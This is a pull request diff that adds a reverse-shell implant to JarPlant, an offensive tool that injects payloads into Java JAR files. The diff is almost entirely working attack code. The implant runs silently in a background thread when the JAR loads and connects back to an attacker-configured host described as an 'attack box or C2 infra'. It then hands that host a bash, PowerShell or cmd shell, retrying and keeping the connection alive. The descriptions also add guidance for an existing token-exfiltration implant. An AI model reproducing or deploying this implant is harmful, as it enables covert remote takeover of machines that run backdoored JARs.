### PR TITLE
Reverse shell implant

### DIFF
--- a/jarplant-cli/src/main/java/io/github/w1th4d/jarplant/Cli.java
+++ b/jarplant-cli/src/main/java/io/github/w1th4d/jarplant/Cli.java
@@ -14,8 +14,8 @@ import java.nio.charset.StandardCharsets;
 import java.nio.file.Files;
 import java.nio.file.Path;
 import java.util.*;
-import java.util.logging.Formatter;
 import java.util.logging.*;
+import java.util.logging.Formatter;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
@@ -78,7 +78,7 @@ public class Cli {
                 .required(false);
         classInjectorParser.addArgument("-i", "--implant-class")
                 .help("Name of the class containing a custom 'init()' method and other implant logic.")
-                .choices("ClassImplant", "StealerExfil")
+                .choices("ClassImplant", "RevShell", "StealerExfil")
                 .setDefault("ClassImplant");
         classInjectorParser.addArgument("-c", "--config")
                 .help("Override one or more configuration properties inside the implant.")
@@ -213,6 +213,12 @@ public class Cli {
         if (implantClassName.equals("ClassImplant")) {
             try {
                 implantHandler = ImplantHandlerImpl.findAndCreateFor(ClassImplant.class);
+            } catch (ClassNotFoundException | IOException | ImplantException e) {
+                throw new RuntimeException("Cannot find built-in implant class.", e);
+            }
+        } else if (implantClassName.equals("RevShell")) {
+            try {
+                implantHandler = ImplantHandlerImpl.findAndCreateFor(RevShellImplant.class);
             } catch (ClassNotFoundException | IOException | ImplantException e) {
                 throw new RuntimeException("Cannot find built-in implant class.", e);
             }

--- a/jarplant-implants/pom.xml
+++ b/jarplant-implants/pom.xml
@@ -69,6 +69,13 @@
             <scope>test</scope>
         </dependency>
 
+        <dependency>
+            <groupId>com.google.jimfs</groupId>
+            <artifactId>jimfs</artifactId>
+            <version>1.3.0</version>
+            <scope>test</scope>
+        </dependency>
+
         <!-- https://mvnrepository.com/artifact/com.fasterxml.jackson.core/jackson-core -->
         <dependency>
             <groupId>com.fasterxml.jackson.core</groupId>

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ImplantInfo.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/ImplantInfo.java
@@ -24,11 +24,19 @@ public enum ImplantInfo {
     SpringImplantConfiguration(
             io.github.w1th4d.jarplant.implants.SpringImplantConfiguration.class,
             "Template for adding your Spring implant component to a Spring configuration class."),
+    RevShell(
+            RevShellImplant.class,
+            "Classic reverse shell that connects to a specified hostname, IPv4 or IPv6 address and TCP port."
+                    + " Popping shells is fun but bad OpSec."
+                    + " Perfect for CTF:s, but not so good for Red Team engagements when faced with a competent Blue Team."
+                    + " Be sure to set CONF_LHOST to your attack box or C2 infra. Optionally set CONF_LPORT (default 12345)."
+    ),
     StealerExfil(
             StealerExfil.class,
             "Exfiltrate host environment information and access tokens."
                     + " Exfiltrate interesting environment variables and properties that may contain various cloud tokens and secrets."
                     + " It encodes all exfil data using a custom compression/encoding scheme optimized for token data and splits it ut into sub-requests as necessary."
+                    + " Be sure to set CONF_DOMAIN to a domain under your control. Preferably one where you run an instance of Interactsh."
     );
 
     public final Class<?> clazz;

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -120,7 +120,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 log("[$] Shell '" + shellCommandExecStr + "' popped with PID " + shell.pid() + ".");
 
                 Thread pipe1 = new Thread(() -> {
-                    transfer(fromShell, toRemote);
+                    transfer(fromShell, toRemote, getSendBufferSize(connection));
                     log("[-] Shell terminated.");
                     closeAll(connection);
                     shell.destroy();
@@ -128,7 +128,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 pipe1.start();
 
                 Thread pipe2 = new Thread(() -> {
-                    transfer(fromRemote, toShell);
+                    transfer(fromRemote, toShell, getRecvBufferSize(connection));
                     log("[-] Connection terminated.");
                     closeAll(connection);
                     shell.destroy();
@@ -189,16 +189,33 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    private static int getSendBufferSize(Socket socket) {
+        try {
+            return socket.getSendBufferSize();
+        } catch (SocketException e) {
+            return 65536;
+        }
+    }
+
+    private static int getRecvBufferSize(Socket socket) {
+        try {
+            return socket.getReceiveBufferSize();
+        } catch (SocketException e) {
+            return 65536;
+        }
+    }
+
     /**
      * Transfer all data from one stream to another.
      * No string/text interpretation will be done. Just raw bytes.
      * This method blocks and returns only if the streams are closed, or the current thread is interrupted.
      *
-     * @param input  from
-     * @param output to
+     * @param input      from
+     * @param output     to
+     * @param bufferSize size of the read buffer
      */
-    private static void transfer(InputStream input, OutputStream output) {
-        byte[] buffer = new byte[256];
+    private static void transfer(InputStream input, OutputStream output, int bufferSize) {
+        byte[] buffer = new byte[bufferSize];
         while (!Thread.interrupted()) {
             try {
                 int readAmount = input.read(buffer);

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -65,7 +65,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      * Print debug output to stdout.
      * Setting this to false will make the implant completely quiet.
      */
-    static volatile boolean CONF_DEBUG_OUTPUT = true;
+    static volatile boolean CONF_DEBUG_OUTPUT = false;
 
     @SuppressWarnings("unused")
     public static void init() {

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -5,6 +5,8 @@ import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
 import java.net.Socket;
+import java.nio.file.FileSystem;
+import java.nio.file.FileSystems;
 import java.nio.file.Files;
 import java.nio.file.Path;
 import java.time.Duration;
@@ -158,7 +160,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
     }
 
     /**
-     * Find the most preferred shell.
+     * Find the most preferred shell depending on the operating system and what's available.
      *
      * @return maybe a path to an executable file
      */
@@ -166,21 +168,22 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         String osName = System.getProperty("os.name").toLowerCase();
         if (osName.startsWith("windows")) {
             String pathEnv = System.getenv("PATH");
-            return findWindowsShellExecutable(pathEnv);
+            return findWindowsShellExecutable(FileSystems.getDefault(), pathEnv);
         } else if (osName.startsWith("linux")) {
-            return findUnixShellExecutable();
+            return findUnixShellExecutable(FileSystems.getDefault());
         } else if (osName.startsWith("mac")) {
-            return findUnixShellExecutable();
+            return findUnixShellExecutable(FileSystems.getDefault());
         } else {
             return Optional.empty();
         }
     }
 
-    static Optional<Path> findUnixShellExecutable() {
+    // Separate method for testability.
+    static Optional<Path> findUnixShellExecutable(FileSystem fs) {
         List<Path> candidates = Arrays.asList(
-                Path.of("/bin/bash"),
-                Path.of("/bin/zsh"),
-                Path.of("/bin/sh")
+                fs.getPath("/bin/bash"),
+                fs.getPath("/bin/zsh"),
+                fs.getPath("/bin/sh")
         );
         for (Path candidate : candidates) {
             if (Files.exists(candidate) && Files.isExecutable(candidate)) {
@@ -191,7 +194,8 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         return Optional.empty();
     }
 
-    static Optional<Path> findWindowsShellExecutable(String pathEnv) {
+    // Separate method for testability.
+    static Optional<Path> findWindowsShellExecutable(FileSystem fs, String pathEnv) {
         if (pathEnv == null || pathEnv.isEmpty()) {
             return Optional.empty();
         }
@@ -199,9 +203,11 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         Optional<Path> powershell = Optional.empty();
         Optional<Path> cmd = Optional.empty();
 
-        String[] binPaths = pathEnv.split(File.pathSeparator);
+        // PowerShell can exist on some various paths depending on the version and how it was installed.
+        // cmd is expected to always be in the same place, but do what Windows does and search the PATH for it.
+        String[] binPaths = pathEnv.split(";");
         for (String binPath : binPaths) {
-            Path path = Path.of(binPath);
+            Path path = fs.getPath(binPath);
             if (Files.exists(path) && Files.isDirectory(path)) {
                 if (powershell.isEmpty()) {
                     Path candidate = path.resolve("powershell.exe");
@@ -219,6 +225,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             }
         }
 
+        // PowerShell is preferred over cmd but cmd is better than nothing.
         if (powershell.isPresent()) {
             return powershell;
         } else if (cmd.isPresent()) {

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -85,15 +85,14 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
         while (!Thread.interrupted()) {
             log("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
-            Process shell = null;
             try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT);
-                 InputStream fromRemote = connection.getInputStream();
-                 OutputStream toRemote = connection.getOutputStream()
+                InputStream fromRemote = connection.getInputStream();
+                OutputStream toRemote = connection.getOutputStream();
             ) {
                 log("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
 
                 String shellCommandExecStr = shellCommand.get().toAbsolutePath().toString();
-                shell = new ProcessBuilder()
+                Process shell = new ProcessBuilder()
                         .command(shellCommandExecStr)
                         .redirectErrorStream(true)
                         .start();
@@ -116,6 +115,8 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 log("[ ] Waiting...");
                 pipe1.join();
                 pipe2.join();
+
+                shell.destroy();
                 log("[ ] Terminated.");
             } catch (IOException e) {
                 log("[!] " + e.getClass().getName() + ": " + e.getMessage());
@@ -126,10 +127,6 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 }
             } catch (InterruptedException ignored) {
                 Thread.currentThread().interrupt();
-            } finally {
-                if (shell != null) {
-                    shell.destroy();
-                }
             }
         }
     }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -1,9 +1,32 @@
 package io.github.w1th4d.jarplant.implants;
 
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.net.Socket;
+import java.time.Duration;
+
 public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandler {
+    // Standard config fields from ClassImplant template:
     static volatile String CONF_JVM_MARKER_PROP = "java.class.init";
     static volatile boolean CONF_BLOCK_JVM_SHUTDOWN = false;
     static volatile int CONF_DELAY_MS = 0;
+
+    /**
+     * Hostname, IPv4 address or IPv6 address to connect back to.
+     * This should be your attack box or C2 infra.
+     */
+    static volatile String CONF_LHOST = "localhost";
+
+    /**
+     * TCP port number to use when connecting back.
+     */
+    static volatile int CONF_LPORT = 12345;
+
+    /**
+     * Amount of seconds to wait between connection attempts.
+     */
+    static volatile int CONF_RETRY_WAIT_SECONDS = 30;
 
     @SuppressWarnings("unused")
     public static void init() {
@@ -36,5 +59,88 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
     }
 
     private void payload() {
+        if (CONF_LHOST == null || CONF_LHOST.isEmpty()) {
+            return;
+        }
+
+        while (!Thread.interrupted()) {
+            System.out.println("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
+            try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT)) {
+                InputStream fromRemote = connection.getInputStream();
+                OutputStream toRemote = connection.getOutputStream();
+                System.out.println("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
+
+                Process shell = new ProcessBuilder()
+                        .command("/bin/bash")
+                        .redirectErrorStream(true)
+                        .start();
+                InputStream fromShell = shell.getInputStream();
+                OutputStream toShell = shell.getOutputStream();
+                System.out.println("[$] Shell popped with PID " + shell.pid() + ".");
+
+                Thread pipe1 = new Thread(() -> {
+                    transfer(fromShell, toRemote);
+                });
+                pipe1.start();
+
+                Thread pipe2 = new Thread(() -> {
+                    transfer(fromRemote, toShell);
+                });
+                pipe2.start();
+
+                System.out.println("[ ] Waiting...");
+                pipe1.join();
+                pipe2.join();
+
+                shell.destroy();
+                System.out.println("[ ] Terminated.");
+            } catch (IOException e) {
+                System.out.println("[!] " + e.getClass().getName() + ": " + e.getMessage());
+                try {
+                    Thread.sleep(Duration.ofSeconds(CONF_RETRY_WAIT_SECONDS).toMillis());
+                } catch (InterruptedException ignored) {
+                    Thread.currentThread().interrupt();
+                }
+            } catch (InterruptedException ignored) {
+                Thread.currentThread().interrupt();
+            }
+        }
+    }
+
+    /**
+     * Transfer all data from one stream to another.
+     * No string/text interpretation will be done. Just raw bytes.
+     * This method blocks and returns only if the streams are closed, or the current thread is interrupted.
+     *
+     * @param input  from
+     * @param output to
+     */
+    private static void transfer(InputStream input, OutputStream output) {
+        byte[] buffer = new byte[256];
+        while (!Thread.interrupted()) {
+            try {
+                int readAmount = input.read(buffer);
+                if (readAmount == -1) {
+                    break;
+                }
+                output.write(buffer, 0, readAmount);
+                output.flush();
+                System.out.print(".");
+                System.out.flush();
+            } catch (IOException e) {
+                break;
+            }
+        }
+
+        try {
+            input.close();
+            output.close();
+        } catch (IOException ignored) {
+        }
+    }
+
+    public static void main(String[] args) {
+        RevShellImplant implant = new RevShellImplant();
+        implant.payload();
     }
 }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -14,6 +14,14 @@ import java.util.Arrays;
 import java.util.List;
 import java.util.Optional;
 
+/**
+ * Reverse shell implant for JarPlant.
+ * This implant initiates a TCP connection to a configured host+port, executes a shell process on the system and pipes
+ * it all together.
+ * Make sure to set the CONFIG_LHOST variable when injecting this implant!
+ * This code conforms with the standard template for a JarPlant implant.
+ * It's not designed to be included in other codebases but could serve as inspiration.
+ */
 public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandler {
     // Standard config fields from ClassImplant template:
     static volatile String CONF_JVM_MARKER_PROP = "java.class.init";
@@ -89,6 +97,9 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         // Silently ignore (don't throw up error messages on stderr)
     }
 
+    /**
+     * Code specific to RevShellImplant begins here.
+     */
     private void payload() {
         if (CONF_LHOST == null || CONF_LHOST.isEmpty()) {
             log("[!] No CONF_LHOST set! Aborting.");
@@ -154,6 +165,12 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    /**
+     * Configure TCP keep-alive for a socket.
+     * These options are technically platform-specific but are typically available for Linux, Windows and macOS.
+     *
+     * @param socket the socket to configure
+     */
     @SuppressWarnings("unchecked")
     private static void setKeepAliveOptions(Socket socket) {
         try {
@@ -189,6 +206,13 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    /**
+     * Get the send buffer size of a socket.
+     * This depends on the platform.
+     *
+     * @param socket the socket
+     * @return size of the send buffer in bytes, or 65536 if unknown
+     */
     private static int getSendBufferSize(Socket socket) {
         try {
             return socket.getSendBufferSize();
@@ -197,6 +221,13 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    /**
+     * Get the receiving buffer size of a socket.
+     * This depends on the platform.
+     *
+     * @param socket the socket
+     * @return size of the receiving buffer in bytes, or 65536 or unknown
+     */
     private static int getRecvBufferSize(Socket socket) {
         try {
             return socket.getReceiveBufferSize();
@@ -208,7 +239,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
     /**
      * Transfer all data from one stream to another.
      * No string/text interpretation will be done. Just raw bytes.
-     * This method blocks and returns only if the streams are closed, or the current thread is interrupted.
+     * This method blocks and returns only if the streams are closed or the current thread is interrupted.
      *
      * @param input      from
      * @param output     to
@@ -230,6 +261,11 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    /**
+     * Utility method to ensure things are properly closed.
+     *
+     * @param closeables things to close
+     */
     private static void closeAll(Closeable... closeables) {
         for (Closeable closeable : closeables) {
             try {
@@ -315,6 +351,11 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    /**
+     * Maybe log something to stdout depending on configuration.
+     *
+     * @param msg message
+     */
     private static void log(String msg) {
         if (CONF_DEBUG_OUTPUT) {
             System.out.println(msg);

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -85,14 +85,15 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
         while (!Thread.interrupted()) {
             log("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
+            Process shell = null;
             try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT);
-                InputStream fromRemote = connection.getInputStream();
-                OutputStream toRemote = connection.getOutputStream();
+                 InputStream fromRemote = connection.getInputStream();
+                 OutputStream toRemote = connection.getOutputStream()
             ) {
                 log("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
 
                 String shellCommandExecStr = shellCommand.get().toAbsolutePath().toString();
-                Process shell = new ProcessBuilder()
+                shell = new ProcessBuilder()
                         .command(shellCommandExecStr)
                         .redirectErrorStream(true)
                         .start();
@@ -113,8 +114,6 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 log("[ ] Waiting...");
                 pipe1.join();
                 pipe2.join();
-
-                shell.destroy();
                 log("[ ] Terminated.");
             } catch (IOException e) {
                 log("[!] " + e.getClass().getName() + ": " + e.getMessage());
@@ -125,6 +124,10 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 }
             } catch (InterruptedException ignored) {
                 Thread.currentThread().interrupt();
+            } finally {
+                if (shell != null) {
+                    shell.destroy();
+                }
             }
         }
     }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -1,6 +1,6 @@
 package io.github.w1th4d.jarplant.implants;
 
-import java.io.File;
+import java.io.Closeable;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
@@ -11,6 +11,7 @@ import java.nio.file.Files;
 import java.nio.file.Path;
 import java.time.Duration;
 import java.util.Arrays;
+import java.util.LinkedList;
 import java.util.List;
 import java.util.Optional;
 
@@ -101,19 +102,9 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 OutputStream toShell = shell.getOutputStream();
                 log("[$] Shell '" + shellCommandExecStr + "' popped with PID " + shell.pid() + ".");
 
-                Thread pipe1 = new Thread(() -> {
-                    transfer(fromShell, toRemote);
-                });
-                pipe1.start();
+                log("[ ] Transferring data between shell and socket...");
+                handleCommunications(fromShell, toShell, fromRemote, toRemote, connection);
 
-                Thread pipe2 = new Thread(() -> {
-                    transfer(fromRemote, toShell);
-                });
-                pipe2.start();
-
-                log("[ ] Waiting...");
-                pipe1.join();
-                pipe2.join();
                 log("[ ] Terminated.");
             } catch (IOException e) {
                 log("[!] " + e.getClass().getName() + ": " + e.getMessage());
@@ -132,6 +123,32 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         }
     }
 
+    // Separate method for testability.
+    static void handleCommunications(InputStream fromShell, OutputStream toShell, InputStream fromRemote, OutputStream toRemote, Socket socket) throws InterruptedException {
+        List<Thread> threads = new LinkedList<>();
+
+        Thread pipe1 = new Thread(() -> {
+            transfer(fromShell, toRemote, threads);
+            closeAll(fromShell, toShell, fromRemote, toRemote, socket);
+        });
+
+        Thread pipe2 = new Thread(() -> {
+            transfer(fromRemote, toShell, threads);
+            closeAll(fromShell, toShell, fromRemote, toRemote, socket);
+        });
+
+        threads.add(pipe1);
+        threads.add(pipe2);
+
+        pipe1.start();
+        pipe2.start();
+
+        pipe1.join();
+        System.out.println("shell -> socket: done");
+        pipe2.join();
+        System.out.println("socket -> shell: done");
+    }
+
     /**
      * Transfer all data from one stream to another.
      * No string/text interpretation will be done. Just raw bytes.
@@ -140,7 +157,9 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      * @param input  from
      * @param output to
      */
-    private static void transfer(InputStream input, OutputStream output) {
+    private static void transfer(InputStream input, OutputStream output, List<Thread> threads) {
+        System.out.println("transfer started");
+
         byte[] buffer = new byte[256];
         while (!Thread.interrupted()) {
             try {
@@ -155,10 +174,17 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
             }
         }
 
-        try {
-            input.close();
-            output.close();
-        } catch (IOException ignored) {
+        for (Thread thread : threads) {
+            thread.interrupt();
+        }
+    }
+
+    private static void closeAll(Closeable... closeables) {
+        for (Closeable closeable : closeables) {
+            try {
+                closeable.close();
+            } catch (IOException ignored) {
+            }
         }
     }
 

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -24,7 +24,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      * Hostname, IPv4 address or IPv6 address to connect back to.
      * This should be your attack box or C2 infra.
      */
-    static volatile String CONF_LHOST = "localhost";
+    static volatile String CONF_LHOST;
 
     /**
      * TCP port number to use when connecting back.
@@ -91,6 +91,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
     private void payload() {
         if (CONF_LHOST == null || CONF_LHOST.isEmpty()) {
+            log("[!] No CONF_LHOST set! Aborting.");
             return;
         }
 

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -4,8 +4,7 @@ import java.io.Closeable;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
-import java.net.InetSocketAddress;
-import java.net.Socket;
+import java.net.*;
 import java.nio.file.FileSystem;
 import java.nio.file.FileSystems;
 import java.nio.file.Files;
@@ -32,12 +31,27 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
      */
     static volatile int CONF_LPORT = 12345;
 
-    static volatile int CONF_TIMEOUT_SECONDS = 10;
+    /**
+     * Timeout in seconds for each connection attempt.
+     */
+    static volatile int CONF_TIMEOUT_SECONDS = 30;
 
     /**
      * Amount of seconds to wait between connection attempts.
      */
     static volatile int CONF_RETRY_WAIT_SECONDS = 30;
+
+    /**
+     * Amount of seconds between TCP keep-alive probes.
+     * This value will be used for the TCP_KEEPIDLE and TCP_KEEPINTERVAL socket options (if available).
+     */
+    static volatile int CONF_TCP_KEEPALIVE_SECONDS = 30;
+
+    /**
+     * Number of keep-alive probe attempts before considering the socket broken.
+     * This value will be used for the TCP_KEEPCOUNT socket option (if available).
+     */
+    static volatile int CONF_TCP_KEEPALIVE_ATTEMPTS = 3;
 
     /**
      * Print debug output to stdout.
@@ -89,8 +103,8 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         while (!Thread.interrupted()) {
             log("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
             try (Socket connection = new Socket()) {
-                connection.setKeepAlive(true);
-                connection.connect(new InetSocketAddress(CONF_LHOST, CONF_LPORT), CONF_TIMEOUT_SECONDS);
+                setKeepAliveOptions(connection);
+                connection.connect(new InetSocketAddress(CONF_LHOST, CONF_LPORT), (int) Duration.ofSeconds(CONF_TIMEOUT_SECONDS).toMillis());
                 InputStream fromRemote = connection.getInputStream();
                 OutputStream toRemote = connection.getOutputStream();
                 log("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
@@ -106,6 +120,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
                 Thread pipe1 = new Thread(() -> {
                     transfer(fromShell, toRemote);
+                    log("[-] Shell terminated.");
                     closeAll(connection);
                     shell.destroy();
                 });
@@ -113,6 +128,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
                 Thread pipe2 = new Thread(() -> {
                     transfer(fromRemote, toShell);
+                    log("[-] Connection terminated.");
                     closeAll(connection);
                     shell.destroy();
                 });
@@ -121,11 +137,11 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 log("[ ] Waiting...");
                 pipe1.join();
                 pipe2.join();
-
-                shell.destroy();
-                log("[ ] Terminated.");
+            } catch (SocketTimeoutException e) {
+                log("[!] " + e.getClass().getName() + ": " + e.getMessage());
             } catch (IOException e) {
                 log("[!] " + e.getClass().getName() + ": " + e.getMessage());
+                log("[ ] Waiting for " + CONF_RETRY_WAIT_SECONDS + " seconds...");
                 try {
                     Thread.sleep(Duration.ofSeconds(CONF_RETRY_WAIT_SECONDS).toMillis());
                 } catch (InterruptedException ignored) {
@@ -133,6 +149,41 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 }
             } catch (InterruptedException ignored) {
                 Thread.currentThread().interrupt();
+            }
+        }
+    }
+
+    @SuppressWarnings("unchecked")
+    private static void setKeepAliveOptions(Socket socket) {
+        try {
+            socket.setKeepAlive(true);
+        } catch (SocketException e) {
+            log("[-] Socket does not support TCP keep-alive.");
+        }
+
+        for (SocketOption<?> option : socket.supportedOptions()) {
+            // Time in seconds before the first keep-alive probe is sent.
+            if (option.name().equals("TCP_KEEPIDLE") && option.type() == Integer.class) {
+                try {
+                    socket.setOption((SocketOption<Integer>) option, CONF_TCP_KEEPALIVE_SECONDS);
+                } catch (Exception ignored) {
+                }
+            }
+
+            // Amount of probes to send before considering the socket broken.
+            if (option.name().equals("TCP_KEEPCOUNT") && option.type() == Integer.class) {
+                try {
+                    socket.setOption((SocketOption<Integer>) option, CONF_TCP_KEEPALIVE_ATTEMPTS);
+                } catch (Exception ignored) {
+                }
+            }
+
+            // Interval in seconds between each keep-alive probe retry.
+            if (option.name().equals("TCP_KEEPINTERVAL") && option.type() == Integer.class) {
+                try {
+                    socket.setOption((SocketOption<Integer>) option, CONF_TCP_KEEPALIVE_SECONDS);
+                } catch (Exception ignored) {
+                }
             }
         }
     }

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -1,0 +1,40 @@
+package io.github.w1th4d.jarplant.implants;
+
+public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandler {
+    static volatile String CONF_JVM_MARKER_PROP = "java.class.init";
+    static volatile boolean CONF_BLOCK_JVM_SHUTDOWN = false;
+    static volatile int CONF_DELAY_MS = 0;
+
+    @SuppressWarnings("unused")
+    public static void init() {
+        if (System.getProperty(CONF_JVM_MARKER_PROP) == null) {
+            if (System.setProperty(CONF_JVM_MARKER_PROP, "true") == null) {
+                RevShellImplant implant = new RevShellImplant();
+                Thread background = new Thread(implant);
+                background.setDaemon(!CONF_BLOCK_JVM_SHUTDOWN);
+                background.setUncaughtExceptionHandler(implant);
+                background.start();
+            }
+        }
+    }
+
+    @Override
+    public void run() {
+        if (CONF_DELAY_MS > 0) {
+            try {
+                Thread.sleep(CONF_DELAY_MS);
+            } catch (InterruptedException ignored) {
+            }
+        }
+
+        payload();
+    }
+
+    @Override
+    public void uncaughtException(Thread thread, Throwable throwable) {
+        // Silently ignore (don't throw up error messages on stderr)
+    }
+
+    private void payload() {
+    }
+}

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -83,9 +83,10 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
 
         while (!Thread.interrupted()) {
             log("[$] Connecting to " + CONF_LHOST + ":" + CONF_LPORT + "...");
-            try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT)) {
+            try (Socket connection = new Socket(CONF_LHOST, CONF_LPORT);
                 InputStream fromRemote = connection.getInputStream();
                 OutputStream toRemote = connection.getOutputStream();
+            ) {
                 log("[+] Connected to " + CONF_LHOST + ":" + CONF_LPORT + "!");
 
                 String shellCommandExecStr = shellCommand.get().toAbsolutePath().toString();

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -155,6 +155,7 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
                 log("[!] " + e.getClass().getName() + ": " + e.getMessage());
                 log("[ ] Waiting for " + CONF_RETRY_WAIT_SECONDS + " seconds...");
                 try {
+                    //noinspection BusyWait because it's by design.
                     Thread.sleep(Duration.ofSeconds(CONF_RETRY_WAIT_SECONDS).toMillis());
                 } catch (InterruptedException ignored) {
                     Thread.currentThread().interrupt();
@@ -344,11 +345,12 @@ public class RevShellImplant implements Runnable, Thread.UncaughtExceptionHandle
         // PowerShell is preferred over cmd but cmd is better than nothing.
         if (powershell.isPresent()) {
             return powershell;
-        } else if (cmd.isPresent()) {
-            return cmd;
-        } else {
-            return Optional.empty();
         }
+        //noinspection OptionalIsPresent because it's more clear this way.
+        if (cmd.isPresent()) {
+            return cmd;
+        }
+        return Optional.empty();
     }
 
     /**

--- a/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
+++ b/jarplant-implants/src/main/java/io/github/w1th4d/jarplant/implants/RevShellImplant.java
@@ -4,6 +4,7 @@ import java.io.Closeable;
 import java.io.IOException;
 import java.io.InputStream;
 import java.io.OutputStream;
+import java.net.InetSocketAddress;
 import java.net.Socket;
